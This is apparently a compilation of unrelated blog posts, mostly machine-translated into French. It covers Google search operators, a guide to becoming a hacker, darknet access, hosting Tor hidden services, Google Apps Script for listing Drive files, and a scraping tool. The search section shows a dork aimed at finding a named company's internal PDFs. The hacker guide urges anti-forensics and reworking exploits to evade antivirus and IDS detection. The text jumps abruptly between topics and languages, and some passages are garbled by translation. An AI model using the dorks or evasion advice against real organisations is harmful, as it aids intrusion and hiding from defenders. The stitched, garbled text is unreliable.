Il y a deux façons de le faire. La première consiste à cliquer sur les «outils» puis sur l'option «à tout moment» et à sélectionner «l'année dernière». La seconde consiste à spécifier une date pour rechercher les résultats avant ou après. Le format est  avant: date  et  après: date . Vous pouvez voir un exemple des options «à tout moment» et «avant» utilisées ci-dessous.

La date de publication n'est qu'une partie du puzzle. Nous pouvons également regrouper les opérateurs pour spécifier la source de nos données. Si nous recherchons «Scapy_Exception», le premier résultat est obsolète et d'autres proviennent de sources qui peuvent ne pas être réputées.

Supposons que nous ne voulons obtenir des réponses que de sources de haute qualité, ou du moins que nous pensons que cela ne produira pas de déchets. Nous pouvons sélectionner autant de sites à ajouter à la liste que nous voulons avec l'   opérateur site: et l'   opérateur OR pour les enchaîner.

site:stackoverflow.com OR site:stackexchange.com OR site:github.com OR site:gitlab.com after:2018 "Scapy_Exception"

En ajoutant  après: 2018  à la chaîne, nous ne trouverons que les résultats après 2018 publiés sur ces sites Web.

Maintenant, les résultats que nous voyons proviennent des sources que nous voulons et se limitent à des dates utiles.

Étape 2. Suppression des résultats indésirables

Disons que nous devons supprimer les résultats de recherche indésirables, en utilisant notre exemple de  std :: list  d'avant. La façon la plus simple de le faire est d'   utiliser l'opérateur - , que nous pouvons utiliser pour éliminer les résultats qui contiennent des phrases clés qui ne sont pas dans le résultat souhaité.

Lorsque nous avons affaire à des acronymes, la manière la plus efficace de procéder consiste à supprimer les résultats contenant des mots mal interprétés. Par exemple, ajouter un simple  -transmis suffit pour nettoyer la recherche précédente.

Nous pouvons également nettoyer ces résultats en éliminant les sites Web des résultats qui provoquent beaucoup de faux résultats. Ici, nous pouvons obtenir des résultats similaires en supprimant les trois premiers sites, ce qui nous donne des résultats non pertinents.

Les deux méthodes sont efficaces pour supprimer les résultats qui encombrent votre recherche.

Étape 3. Identification des fichiers sur des domaines spécifiques

Nous pouvons rechercher des fichiers qui pourraient être intéressants en combinant l'  opérateur de site  et de type de  fichier , ce qui nous permet de trouver éventuellement des fichiers qui n'étaient pas censés être rendus publics. Pour rassembler des documents officiels, les PDF sont un excellent format pour essayer de déterrer.

Ici, nous recherchons dans le domaine spacex.com tous les fichiers PDF qui mentionnent le mot «interne» pour essayer de trouver des documents qui pourraient nous donner des indices sur leurs procédures internes.

Vous pouvez remplacer les PDF par PPTX pour PowerPoint, DOCX pour les fichiers Word et d'autres formats qui pourraient vous intéresser. Si vous avez une liste de plusieurs domaines à rechercher, vous pouvez les chaîner avec l'   opérateur OR pour rechercher des fichiers sur plusieurs sites Web.

Étape 4. Tout utiliser avec la recherche avancée

Bien qu'il ne soit pas aussi simple que de simplement envoyer un opérateur à une recherche standard, vous pouvez toujours accéder à ces options dans une disposition graphique en accédant  à la  page de recherche avancée de Google .

La page de recherche avancée vous permettra d'utiliser n'importe quelle combinaison d'opérateurs pour créer une recherche structurée. Il est surtout utile à titre de référence, car vous ne pouvez utiliser que quelques-uns de ces opérateurs pour une recherche spécifique.

Certaines options utiles ici sont également la langue et la région, qui, selon les recherches que vous effectuez, peuvent être utiles pour filtrer vos résultats dans une région spécifique ou rechercher des documents dans une langue spécifique.

Les recherches Google peuvent être beaucoup plus rapides avec les bons opérateurs

En regroupant différents opérateurs de recherche, il est possible d'effectuer une recherche pleine de résultats non pertinents et de la réduire à la réponse parfaite. Cette compétence est utile non seulement pour les pirates informatiques, mais pour tous ceux qui ont besoin de rechercher des questions urgentes sur la technologie ou les logiciels. Une version plus avancée de cela, Google Dorking, nous permet de rechercher des systèmes vulnérables en utilisant ces opérateurs de recherche pour localiser les chaînes de texte sur les pages exposées, que nous explorerons dans notre prochain article sur l'utilisation de Google pour les enquêtes OSINT.

J'espère que vous avez apprécié ce guide d'utilisation des opérateurs de recherche Google! Si vous avez des questions sur ce tutoriel sur le raffinement de vos recherches en ligne, laissez un commentaire ci-dessous et n'hésitez pas à me contacter sur Instagram @iamshubhamkumar__ .


Les gens recherchent souvent sur le Web des questions comme «Comment devenir un pirate», Quelles sont les compétences requises pour devenir un pirate », Quelle est la meilleure façon d'apprendre à pirater», «Par où commencer» et bien plus encore. J'ai élaboré un guide détaillé sur la façon de devenir un pirate informatique afin qu'il puisse aider tous les techniciens enthousiastes qui ont soif d'en savoir beaucoup sur le piratage. Si vous êtes très fasciné par les techniques de piratage de base, vous avez atterri au bon endroit. Consultez ce guide détaillé sur le piratage et gagnez en admiration pour vous frayer un chemin dans le monde complexe du piratage.

Attitude de pirate

Les hackers sont ceux qui construisent des choses et résolvent des problèmes. L'état d'esprit d'un pirate ne se limite pas à cette culture de piratage de logiciels comprenant des programmeurs experts et des assistants de mise en réseau. L'attitude d'un pirate est quelque peu différente des autres, car sa nature est totalement indépendante du support spécifique dans lequel le pirate travaille.

Les pirates croient à la liberté et à la coopération volontaire. Pour devenir un hacker, vous devez vous comporter comme si vous aviez ce genre d'attitude vous-même. Pour se comporter comme si vous aviez l'attitude, vous devez vraiment croire l'attitude. En cultivant les attitudes des hackers, cela peut vous aider à en savoir plus et à rester motivé. Le moyen le plus puissant de devenir un maître dans n'importe quel domaine est d'imiter l'attitude des maîtres non seulement intellectuels mais aussi passionnés. Voici quelques points qui montrent comment on peut devenir un hacker en cultivant sa mentalité et son attitude.

1. Le monde regorge de problèmes intéressants qui attendent d'être résolus.

Être un hacker semble souvent être très amusant, mais cela demande beaucoup d'efforts suivis de motivation. Pour devenir un hacker, vous devez obtenir un coup de pouce de base en résolvant des problèmes, en affinant vos compétences et en exerçant votre intelligence.

2. Aucun problème ne devrait jamais être résolu deux fois.

Vous devez garder à l'esprit que les cerveaux créatifs sont toujours des ressources précieuses et limitées. Ne perdez jamais votre temps à reformer la roue alors qu'il y a tant de nouveaux problèmes intéressants qui vous attendent.

Vous devez croire que le temps de réflexion des autres pirates est précieux. Par conséquent, c'est une noble responsabilité pour vous de partager les connaissances, de résoudre les problèmes et de donner ensuite les solutions afin que d'autres pirates puissent se concentrer sur la résolution de nouveaux problèmes au lieu de tenir à résoudre de manière durable les problèmes existants.

Cependant, «Aucun problème ne devrait jamais être résolu deux fois» ne signifie pas que vous devez considérer toutes les solutions existantes comme pieuses, ou qu'il n'y a qu'une seule solution précise à un problème donné. Nous rencontrons de nombreux problèmes et une solution pour cela. Il faut souvent considérer que l'on peut faire mieux. Mais, parfois, des barrières techniques ou autre chose peuvent empêcher une bonne solution d'être réutilisée et inciter les gens à redécouvrir des choses.

3. L'attitude ne remplace pas la compétence.

Pour devenir un maître hacker, vous devez développer certaines de ces attitudes. Mais voler une attitude ne fera pas de vous un hacker immédiat. Devenir un pirate informatique requiert certainement de l'intelligence, de la pratique, du dévouement et un travail acharné.

Par conséquent, vous devez apprendre à ne pas croire l'attitude et à estimer les compétences de toutes sortes. Les pirates ne laisseront pas les hypocrites perdre leur temps, mais ils admirent la compétence, en particulier la compétence en piratage, mais la compétence en tout est évaluée. Le travail acharné et le dévouement sont un must qui joue un rôle important pour devenir un hacker.

4. L'ennui et la corvée sont destructeurs.

Les hackers ne devraient ni s'ennuyer, ni avoir à s'immiscer dans un travail stupide et monotone. L'ennui et la corvée ne sont pas seulement désagréables mais vraiment mauvais. Il est à peu près bon que vous deviez vous éloigner autant que possible des bits ennuyeux, pas seulement pour vous-même mais pour tout le monde (en particulier les autres pirates).

5. Soyez créatif

Si vous souhaitez devenir un hacker, vous devez être créatif et commencer à penser artistiquement. Les pirates devraient être comme un mélange d'artistes, d'ingénieurs et de philosophes. Les pirates ont une diversité d'intérêts culturels et intellectuels, en dehors du piratage.

Quelles compétences sont nécessaires pour devenir un pirate informatique?

En termes simples, il n'y a pas de magie pour devenir un Hacker. Mais, comme toute autre chose importante, il faut du dévouement et de l'enthousiasme pour apprendre. Il est nécessaire d'avoir une connaissance de base de divers sujets que vous pouvez consulter dans les étapes ci-dessous. Ce sont les bases que chaque hacker devrait connaître avant même d'essayer de pirater. Une fois que vous avez une bonne compréhension de tout dans ce domaine, vous pouvez passer au niveau intermédiaire.

Compétences fondamentales

La meilleure approche pour vous transformer en hacker est de partir des fondamentaux. Au départ, vous devrez maîtriser les bases pour construire une base solide. Et une fois cela fait, vous serez en mesure d'explorer de nouvelles idées et de commencer à penser comme un pirate. Vous pouvez suivre les points mentionnés ci-dessous pour commencer votre travail en tant que hacker.

1. Explorez les bases

Il est essentiel de devenir un pirate informatique, vous avez besoin de quelques compétences informatiques de base. Ces compétences de base dépassent la capacité de créer un document Word ou de naviguer sur Internet. Vous devez pouvoir utiliser la ligne de commande dans Windows, modifier le registre et configurer vos paramètres réseau. Avant de vous familiariser avec le concept de piratage, vous devez passer un peu de temps à faire des recherches en ligne pour en savoir plus sur le piratage. Cela vous aidera à jeter les bases de vos futures étapes et actions.

2. Compétences techniques

Si vous visez à devenir un bon hacker moyen, vous devez acquérir les compétences techniques suivantes.

>> Programmation

  • C'est la compétence fondamentale de piratage. Apprendre à programmer, c'est comme apprendre à écrire un bon langage naturel.
  • Vous devez apprendre à résoudre les problèmes et à automatiser les tâches.
  • Pour devenir un hacker d'élite, la programmation est la compétence la plus importante que vous ne pouvez pas négliger.
  • Il est toujours préférable d'avoir une connaissance de base des langages de programmation comme C, HTML, PHP, JavaScript , etc.

>> Système d'exploitation

  • Il existe plusieurs systèmes d'exploitation en dehors d'UNIX.
  • Le système d'exploitation Windows est l'un des systèmes les plus souvent compromis. Par conséquent, il est bon d'apprendre à pirater les systèmes Microsoft, qui sont des systèmes à source fermée.
  • Apprenez tout sur le système d'exploitation sur la façon de les utiliser, la procédure de travail, l'accès aux API et bien plus encore.
  • Pour devenir un grand hacker, vous devez connaître les inconvénients de ces systèmes d'exploitation et essayer de les cibler de manière systématique.

>> Réseautage

Vous devez également comprendre les concepts de base de la mise en réseau et des opérations internes. Vous devez apprendre en profondeur comment chaque type de paquet est généré et les ajustements que vous pouvez faire pour les manipuler. Vous devez acquérir une assez bonne connaissance des concepts suivants.

  • Sous-réseau, LAN, WAN, VPN
  • DHCP
  • IPv4, IPv6
  • DNS
  • Modèle OSI
  • Adressage MAC
  • ARP

>> Piratage de site Web

Il existe de nombreuses techniques pour pirater un site Web, il suffit de google OWASP.

Si vous souhaitez devenir un ninja, vous devez acquérir plus de connaissances sur les concepts ci-dessous:

>> Cryptographie

  • Si vous acquérez une connaissance approfondie de la cryptographie qui comprend l'utilisation, la mise en œuvre et le processus de rupture, il serait préférable de devenir un excellent pirate informatique.
  • Plus vous apprenez les forces et les vulnérabilités de chaque algorithme cryptographique, meilleures sont les possibilités de le surmonter.
  • De plus, la cryptographie peut être utilisée par le pirate pour cacher ses activités et éviter sa détection.

>> Ingénierie inverse (et débogage)

  • La rétro-ingénierie vous permet de supprimer un peu de malware et de le reconstruire avec des fonctionnalités et des capacités supplémentaires.
  • Vous devez apprendre à déboguer ou désassembler et analyser un logiciel pour comprendre comment un logiciel traite ses données et le processus d'extraction d'informations de la mémoire au moment de l'exécution.
  • La rétro-ingénierie permet au pirate de prendre un exploit existant et d'améliorer sa signature afin qu'il puisse espérer les anciennes détections IDS et AV.

>> (Anti-) criminalistique

  • Vous ne serez considéré comme un hacker expert que si vous n'êtes pas pris! Si vous avez été surpris en train de pirater, vous ne pouvez pas devenir un pirate professionnel.
  • Plus vous en savez sur la criminalistique numérique, mieux vous pouvez grandir pour éviter et échapper à la détection.
  • Découvrez où sont stockées les informations incriminantes et comprenez également comment les supprimer de manière sécurisée.

>> Exploiter l'écriture

  • Pour ce faire, vous devez connaître le débogage et la mémoire de l'ordinateur.

>> Virtualisation

  • Vous devez devenir compétent dans l'utilisation de l'un des progiciels de virtualisation qui incluent VirtualBox ou VMWare Workstation.
  • Vous avez besoin d'un environnement sécurisé et protégé pour pratiquer vos hacks avant de les implémenter dans le monde réel.
  • Un environnement virtuel est le meilleur endroit qui vous offre un environnement protégé pour tester et affiner vos hacks.

3. Trouvez une bonne source pour commencer

Il est assez difficile de trouver la meilleure source pour commencer à partir des bases. Bien qu'il existe des millions de livres et d'autres sources sur le Web qui vous apprendront à pirater, ils ont tous besoin que les lecteurs aient un ensemble de compétences et de connaissances préétablies pour comprendre les concepts qui y sont introduits. Cependant, toutes ces sources peuvent ne pas convenir à vos besoins.

Voici une excellente source qui aide les débutants à acquérir beaucoup de connaissances sur le piratage afin que les lecteurs puissent comprendre chaque concept avec beaucoup de facilité. Ce livre s'appelle Hacking Secrets Exposed (HSE). Il est conseillé aux aspirants techniciens qui souhaitent fortement commencer leur quête pour devenir un hacker.

Hacking Secrets Exposed (HSE)

Piratage: l'art de l'exploitation

Combien de temps faut-il pour devenir un hacker?

Cette question est un peu difficile à répondre car ce n'est pas quelque chose qui peut être maîtrisé du jour au lendemain. Cela nécessite des connaissances, des compétences, de la créativité, du dévouement et, bien sûr, du temps. Tout le monde peut devenir un pirate à condition de l'apprendre des fondamentaux et de construire une base solide. Donc, si vous aspirez à être un hacker, tout ce dont vous avez besoin est de la passion et de l'enthousiasme pour apprendre et une bonne source de connaissances qui vous guidera à travers différents concepts dès le départ. Le facteur le plus important pour devenir le meilleur pirate est la persévérance.

Cela dépend également de votre talent et de la force avec laquelle vous travaillez avec détermination. La plupart des gens qui essaient peuvent obtenir un ensemble de compétences décent en dix-huit mois à deux ans s'ils s'y concentrent complètement. Cependant, le piratage est un vaste océan qui met des années à explorer son mystère. Et si vous êtes un véritable hacker, vous passerez le reste de votre vie à apprendre et à développer votre métier.

Âge pour commencer à apprendre à pirater

Le bon âge pour commencer à apprendre à pirater est tout âge auquel vous êtes motivé. La plupart des gens semblent s'intéresser entre 15 et 20 ans, mais vous devez connaître les exceptions dans les deux sens.

Si vous avez toutes les compétences mentionnées ci-dessus, vous pouvez devenir un pirate informatique qualifié afin de pouvoir commencer la mise en œuvre dans le monde réel. Ci-dessus sont mentionnées les étapes complètes sur la façon d'être un pirate informatique qui peuvent vous aider à marcher sur la voie d'un pirate expert. Suivez le guide complet que j'ai expliqué dans le tutoriel pour acquérir à peu près des connaissances sur le piratage et devenir un pro du piratage.


Comment accéder à Darknet: Internet anonyme caché

Publié: 16 décembre 2015 dans Réseautage , Piratages technologiques

73

 

 

 

 

 

 

28 Voix

Accéder à Darknet

Peut-être connaissez-vous le mystérieux Internet caché appelé «DarkNet» ou «Deep Web» auquel vous ne pouvez pas accéder depuis Google et qui est hors de portée de la plupart des gens comme nous. Vous avez peut-être entendu parler d'un pirate informatique vendant des informations de carte de crédit, des fuites de données en ligne de grandes entreprises (Ashley Madison, Sony, etc.) et une variété de ces informations. Peut-être que vous vivez dans un pays où vous n'êtes pas autorisé à parler librement… Si vous ne le savez pas, nous vous dirons ce que c'est et comment accéder à Darknet.

Téléchargez l'application Spyboy

Obtenez le sur Google Play

Qu'est-ce que Dark Net?

Vous devez d'abord connaître le Deep Web. Le Deep Web représente 99% d'Internet qui n'est pas accessible via Google. Le Deep Web comprend de grandes bibliothèques, de grandes bases de données et des sites Web réservés aux membres qui ne sont pas accessibles au grand public. Si vous avez un réseau de bibliothèques sur votre campus ou un réseau de bases de données dans votre entreprise auquel vous seul pouvez accéder, c'est DarkWeb.

Darknet est un réseau de superposition accessible uniquement à l'aide de logiciels, de configurations ou d'autorisations spécifiques. Il fait partie du Deep Web, car son contenu n'est pas accessible par les moteurs de recherche. Mais c'est quelque chose de plus, c'est anonyme. Il héberge des sites Web anonymes. Oui, vous ne sauriez pas qui est le propriétaire à moins qu'il ne révèle explicitement ses informations. Il offre également un anonymat complet aux utilisateurs. L'anonymat de Darknet est généralement obtenu en utilisant un «réseau d'oignons». Je suis sûr que vous avez coupé un oignon une fois dans votre vie et que vous étiez fou du nombre de couches qu'il contient, il en va de même lorsque vous utilisez un réseau d'oignons. Il existe un certain nombre de couches de chiffrement qui cachent votre véritable identité.

Utilisations de Darknet:

Ok, donc vous avez compris ce qu'est Darknet, vous pouvez maintenant me demander pourquoi vous devriez l'utiliser. Eh bien, la raison pourrait être l'un d'eux:

  1. Pour mieux protéger le droit à la vie privée des citoyens d'une surveillance ciblée et de masse.
  2. Dénonciation et fuites de nouvelles
  3. Piratage informatique et criminalité informatique. Peut-être voudrez-vous discuter avec les pirates informatiques les plus dangereux.
  4. Vente de marchandises soumises à restrictions.
  5. Partage de fichiers.

Accéder à Darknet

Comment accéder à DarkNet?

Eh bien, le moyen le plus populaire d'accéder à Darknet est d'utiliser le navigateur TOR. Techniquement, cela signifie 'The Onion Router' et c'est aussi simple que d'installer un nouveau navigateur.

Après cela, vous aurez besoin d'une URL ou d'un répertoire contenant des URL vers différents sites Web ou classes de sites Web afin de savoir quoi taper dans la barre d'adresse du navigateur.

Vous pouvez facilement obtenir des URL dans le répertoire Onion de Darknet à http://am4wuhz3zifexz5u.onion/ ou simplement google pour DarknetSites.

Assurez-vous d'utiliser le navigateur TOR.

Tout comme vous avez Google, Yahoo, etc. pour notre Internet largement connu, Darknet dispose également d'un moteur de recherche. Certains sont Torch, Duck Duck Go, etc.

Si vous souhaitez accéder à Darknet depuis votre joli téléphone, vous pouvez utiliser ORBOT (gratuit).

Je pense que vous voulez explorer Darknet vous-même, donc je vous laisse ici. Juste un conseil, il est utilisé pour tout ce qui est légal ou illégal. Assurez-vous donc de vérifier les liens sur lesquels vous cliquez.

REMARQUE: accédez à Darknet à vos propres risques. Darknet est rempli de contenus légaux et illégaux. Par conséquent, assurez-vous de ne pas cliquer sur le contenu illégal ni d'y accéder. Si vous rencontrez des problèmes, commentez ci-dessous.

Assurez-vous d'être sécurisé après l'accès.

Je (le blog de shubham) n'est pas responsable de tout ce qui vous est arrivé. Vous êtes le seul responsable de vous protéger.


Posted: February 19, 2016 in Networking, Programming, Tech hacks

3

 

 

 

 

 

 

4 Votes

Tor is an anonymous, secure network that allows anyone to access websites with anonymity. People normally use Tor to access normal websites, but they don’t have to. If you want to set up your own anonymous website, you can create a hidden service Tor site. Your hidden service website runs entirely within Tor, so no one will know who created and runs the website. Only people using Tor can access it, though. Hidden service Tor sites are ideal for anyone who wants to set up a website anonymously, such as political activists in repressive countries.

Not all hidden services have to be websites. You could create an SSH server, IRC server, or any other type of server and offer it as a hidden service on Tor. This tutorial will focus on setting up a hidden Tor site using the Savant web server – which Tor recommends – on Windows. The steps can also be applied to other operating systems and web servers.

Download Spyboy App

Obtenez le sur Google Play

Step 1: Install Tor

To get started, you’ll have to download and install Tor on your computer. If you already have it installed, you can skip this step. By default, Tor installs the Tor browser bundle, which includes a specially configured Firefox browser.

sites tor cachés

You’ll see a green onion icon in your system tray when you’re connected to the Tor network.

sites web tor

Once it’s installed, you can check out an example hidden service by pluggingduskgytldkxiuqc6.onion into your Tor web browser’s address bar.

sites web tor

Tor must always be running on your system for the hidden service to be accessible. If your computer is off, disconnected from the Internet, or if Tor isn’t running, the hidden service Tor side won’t be accessible. This does have some anonymity implications – it’s theoretically possible to infer whether or not your computer is running the hidden service by seeing whether it’s accessible when your computer is off.

Step 2: Install & Configure A Web Server

You’ll need a web server to serve the hidden service site from your system. Tor’s official documentation recommends against using the common Apache web server. Instead, Tor recommends using the Savant web server on Windows or thethttpd Web server on Mac OS X, Linux and other UNIX-like operating systems. Tor’s documentation notes that Apache “[is] big and has lots of places where it might reveal your IP address or other identifying information, for example in 404 pages” but also notes that “Savant probably has these problems too“.

The takeaway is that web server configuration is very important. If you’re running a very sensitive hidden Tor site, you’ll want to go through your web server’s settings and ensure it isn’t leaking any information that could be used to identify you, such as your IP address.

We’ll use Savant as an example here, but you can set the same options in other web servers. To configure Savant, launch its main window and click the Configuration button.

sites web tor

From the configuration window, you’ll need to set the “Server DNS Entry” box to “localhost” to bind Savant to localhost. This ensures your website is only accessible from your local computer, so people can’t access it over the normal Web and see you’re hosting the hidden service Tor site.

You’ll also have to note the port number you’re using.

sites tor

After the web server is configured, you’ll want to add your content. By default, Savant uses the C:\Savant\Root directory (you can change this from the Pathstab). Ensure you replace the index.html file in this directory with the file you want as your homepage.

sites tor

You can verify it works by typing localhost into your main browser’s address bar. If you set a different port instead of 80 – say, port 1000 – type localhost:1000instead.

sites tor

Step 3: Configure The Hidden Service

Now that Tor’s installed and a web server is running, all you have to do is tell Tor about it. You should be able to add this information to the torrc file through the Vidalia graphical user interface, but I experienced errors and had to do this by hand.

First, shut down Tor if it’s running.

sites web tor

Next, locate your torrc file. If you installed the Tor Browser Bundle, you’ll find it in the Tor Browser\Data\Tor directory. Open this file with Notepad or another text editor.

sites web tor

Add the following section to the end of the file:

1

2

3

<em># Hidden Service</em>

<em>HiddenServiceDir C:\Users\Name\tor_service</em>

<em>HiddenServicePort 80 127.0.0.1:80</em>

Replace C:\Users\Name\tor_service with the path to a directory Tor can read and write to on your system. Do not use the directory that already contains your website. This should be an empty directory.

Replace the :80 with the port the web server is using on your system. For example, if the web server is running on port 5000, you’d use the line HiddenServicePort 80 127.0.0.1:5000.

sites web tor

Save the file after editing it. You’ll also have to create the directory you specified, if it doesn’t already exist.

image

Restart Tor after you do this. Once you have, you’ll want to check the Message Log to see if there are any error messages.

image

If the Message log is free of errors, you’re good to go. Check out the hidden service directory you created. Tor will have created two files in the directory – hostname and private_key. Don’t give anyone the private_key file or they’ll be able to impersonate your hidden service Tor site.

image

Vous voudrez ouvrir le fichier de nom d'hôte dans le Bloc-notes ou un autre éditeur de texte. Il vous indiquera l'adresse de votre nouveau site Tor de service caché. Branchez cette adresse dans votre navigateur Web Tor et vous verrez votre site Web. Donnez l'adresse aux autres afin qu'ils puissent accéder à votre site. N'oubliez pas que les gens doivent utiliser Tor pour accéder à votre site de service caché.

sites tor cachés

Avez-vous utilisé Tor ou créé un site Tor caché? Assurez-vous de partager vos expériences et tous les conseils que vous avez dans les commentaires!

How To Host Your Own .onion Website in Dark Web

Posted: June 22, 2020 in Linux, Networking

0

 

 

 

 

 

 

3 Votes

We have learns how Tor network works and how to use it in our Tor tutorial. As we know dark websites use .onion for their top-level domain(TLD). Here the question comes can we create our own website in Dark Web using our Kali Linux system? The answer is yes easily.

In this post, we are going to learn how we can host own .onion dark web in Kali Linux.

First of all, we install and configure the Tor service. To do that we run following command in our Kali Linux Terminal:

Download Spyboy App

Obtenez le sur Google Play

apt-get install tor

We press y for yes when it prompts for storage permission. The screenshot of the command is the following:

installer tor dans Kali Linux

Then we need to configure torrc file located on /etc/tor/torrc . So we apply the following command :

leafpad /etc/tor/torrc

The screenshot is following:

configuration de torrc

Then we need to find these two lines (showing in the above picture) and remove # from both lines and save the file. After doing this will look like the following :

configurer torrc

Then we restart Tor by using the following command:

service tor restart

Now we create a web page on our desktop called index.html or index.php. We do it by using

cd Desktop && touch index.html

Then we edit the web page file and code a simple website for a demo. We open the html/php file in leafpad

leafpad index.html

And then we write a simple html code like following:

site Web de démonstration html

Then we save and close this file. This file is in our Desktop, so we start a php based localhost server in our Desktop using the following command:

php -S 127.0.0.1:80

serveur web basé sur php

Now we check our hosted localhost website, by navigating 127.0.0.1 from our browser.

Ensuite, nous laissons cette fenêtre de terminal telle quelle. Ensuite, nous ouvrons un autre terminal et saisissons tor dans la ligne de commande.

tor

Attendez un peu et laissez-le se configurer à 100%.

La capture d'écran est la suivante:

serveur web php se connecte avec tor

Tous ensemble, notre dark web est hébergé. Hé, attendez, où est le lien .onion?

Le lien .onion est généré de manière aléatoire. Pour voir le .onion de notre site Web démon hébergé, nous ouvrons une autre fenêtre de terminal (3ème fois, car nous ne pouvons pas fermer ou utiliser ces terminaux, sinon la connexion sera perdue.) Et tapez la commande suivante pour voir notre adresse Dark Web

cat /var/lib/tor/hidden_service/hostname

La capture d'écran est la suivante:

lien vers le site Web de l'oignon

Maintenant, nous pouvons accéder à ce site Web .onion avec le navigateur Tor de n'importe où.

Il s'agit d'un site Web de démonstration à des fins éducatives, mais nous pouvons héberger tout type de site Web. Veuillez ne pas en abuser pour héberger des sites Web illégaux. Ce sera un crime et nous n'en sommes pas responsables


Google Apps Script et Google Drive : fonctions pour gérer les dossiers et les fichiers de Drive – série de scripts 2

 Linkedin Facebook Twitter Email

Vous avez besoin de supprimer d’un coup tous les fichier Sheets du drive datant d’il y a plus de deux ans et qui contiennent le mot “archive” ? Vous avez besoin de récupérer la liste des dossiers et des fichiers appartenant à certaines personnes dans un tableau Sheets ? …

Google Drive et Google Apps Script s’associent pour faciliter et automatiser des manipulations parfois répétitives. Gilbert Roinel vous a concocté une sélection applicable rapidement depuis votre Drive !

Suivez le guide pour prendre le contrôle sur votre espace de stockage préféré !

Cet article s’adresse à tous ceux qui souhaitent s’approprier les possibilités d’intervention sur une application, en particulier sur Google Drive, avec une toute petite appétence minimum pour le codage, sans pour autant avoir forcément pratiqué Apps Script et Java Script.

  1. Série 1 : Lister les dossiers ou les fichiers
  2. Série 2 : Créer des fichiers

Les scripts – série 2

Cette série propose de créer des listes de fichiers dans une feuille de calcul selon plusieurs critères.

1. Lister tous les fichiers Sheets de votre Drive dans une feuille de calcul

Ce script créé une feuille de calcul et y inscrit tous les fichiers Google Sheets présents dans votre Drive, en listant : le nom du fichier, le propriétaire (sauf si la feuille est dans un Drive partagé), l’URL et la date de dernière modification.

Cerise on the cake, il trie les informations par ordre alphabétique.

function listeSheets(){

  // Créer une feuille de calcul à la racine (voir les scripts sur la création de fichiers)

  var ss = SpreadsheetApp.create("Résumé des Sheets") ;

  // ouvrir la feuille de calcul

  var feuille = SpreadsheetApp.openById(ss.getId()).getActiveSheet();

  // Sélectionner tous les fichiers Sheets

  var files = DriveApp.getFilesByType(MimeType.GOOGLE_SHEETS);

  var i = 0;  

   while (files.hasNext()) {

    var file = files.next();

      feuille.getRange(i + 1, 1).setValue(file.getName());

   

   // Si le propriétaire existe (sinon, c'est dans un Drive partagé...)

   if (file.getOwner() != null)

      {

       feuille.getRange(i + 1, 2).setValue(file.getOwner().getName());

      }

      feuille.getRange(i + 1, 3).setValue(file.getUrl());

      feuille.getRange(i + 1, 4).setValue(file.getLastUpdated());

    i++;

  }

 //tri sur la première colonne

  feuille.sort(1);

}

Voici un exemple de résultat :

2. lister les Sheets et les Docs

Pratiquement identique au précédent, sauf qu’une premier boucle « for » permet de lister les Sheets et les Docs.

function listeSheetsOuDocs() {

  var ss = SpreadsheetApp.create("Résumé des Sheets ou Docs") ;

  var feuille = SpreadsheetApp.openById(ss.getId()).getActiveSheet();

   

  var i =0

  var results = [];

  var types = [MimeType.GOOGLE_SHEETS,MimeType.GOOGLE_DOCS];

  for (var t in types) {

    var files = DriveApp.getFilesByType(types[t]);

    while (files.hasNext()) {

      var file = files.next();

     

      // Logger.log([file.getDateCreated(), file.getName(), file.getUrl()].join());

      feuille.getRange(i + 1, 1).setValue(file.getName());

      feuille.getRange(i + 1, 2).setValue(file.getMimeType());

      feuille.getRange(i + 1, 3).setValue(file.getUrl());

      i++

    }

   }

   //tri sur la première colonne

  feuille.sort(1);

  }

3. Lister les images JPG de votre Drive

function listeImagesJpeg(){

  var ss = SpreadsheetApp.create("Résumé des Images JPEG") ;

  var feuille = SpreadsheetApp.openById(ss.getId()).getActiveSheet();

   

  var i = 0

  // Lister les JPEG

  var jpegs = DriveApp.getFilesByType('image/jpeg');

  while (jpegs.hasNext()) {

    var jpeg = jpegs.next();

    Logger.log(jpeg.getSize());

    feuille.getRange(i + 1, 1).setValue(jpeg.getName());

    feuille.getRange(i + 1, 2).setValue(jpeg.getSize());

    feuille.getRange(i + 1, 3).setValue(jpeg.getUrl());

    i++

  }

  //tri sur la seconde colonne

  feuille.sort(2);

}

4. Lister dans une feuille Sheets la liste des fichiers contenant des mots spécifiques

toujours sur le même principe, il faut ici lister les fichiers répondant à certains critères avec la méthode « searchfiles ». Nous cherchons les fichiers contenant les mots « facture » et « 2020 ».

function listeFichiersTexte(){

   var ss = SpreadsheetApp.create("Résumé des sheets factures") ;

   var feuille = SpreadsheetApp.openById(ss.getId()).getActiveSheet();

   var files = DriveApp.searchFiles("title contains 'Facture' and title contains '2020'");

    while (files.hasNext()) {

      var file = files.next();

      var data = [

        file.getName(),

        file.getUrl(),

        file.getMimeType()

      ];

      feuille.appendRow(data);

    }

 }

vous pouvez exclure des termes en ajoutant « not » devant l’instruction :

var files = DriveApp.searchFiles("title contains 'Facture' and not title contains '2020'");


Allez-vous utiliser ces fonctionnalités ? Pour quel besoin ? Avez-vous adapté le script à un cas particulier ? N’hésitez pas à nous laisser un commentaire 🙂


Web   SCRAPiNG  !

Comment créer des recettes personnalisées:

En 5 minutes, vous comprendrez les principes de base de Recipe Creator, comme le survol et le décalage, la sélection de lignes, la sélection de données et l'écriture d'un sélecteur simple.

Regardez le didacticiel sur la sélection des rangées


Regardez le didacticiel de sélection des colonnes


 Vous avez encore des questions?

Contactez-nous: [email protected]

Ou lisez ces étapes rapides

  1. Accédez au site de votre choix, lancez Recipe Creator et choisissez votre type de page "
  2. Les pages de liste nécessitent des lignes et plusieurs pages tandis que les pages de détail n'ont qu'une seule page et ne nécessitent que des colonnes
  3. En commençant par une page de liste, en passant la souris sur les données jusqu'à ce qu'une boîte en surbrillance contienne toutes les informations que vous cherchez à gratter
  4. Une fois la ligne en surbrillance, appuyez sur Maj, puis sur l'outil, sélectionnez l'une des classes suggérées pour verrouiller la sélection.
  5. À ce stade, vous pouvez maintenant sélectionner vos données individuelles. Cliquez sur l'onglet Colonne et sélectionnez «col1».
  6. Donnez un nom à la colonne, survolez les données que vous souhaitez extraire dans cette colonne et appuyez sur Maj.
  7. Choisissez la classe qui met le mieux en valeur les données. (Conseil utile - utilisez le bouton Up Parent pour plus d'options si les données ne sont pas sélectionnées correctement.)
  8. Une fois que les données sont correctement mises en surbrillance, cliquez sur le nom de la classe, confirmez-les et cliquez sur Données, vérifiez votre travail.
  9. Continuez à créer en cliquant sur "+ Colonne".
  10. Une fois que vous avez toutes les colonnes, terminez en cliquant sur l'onglet Enregistrer en haut. Donnez un nom à la recette et cliquez sur Enregistrer.
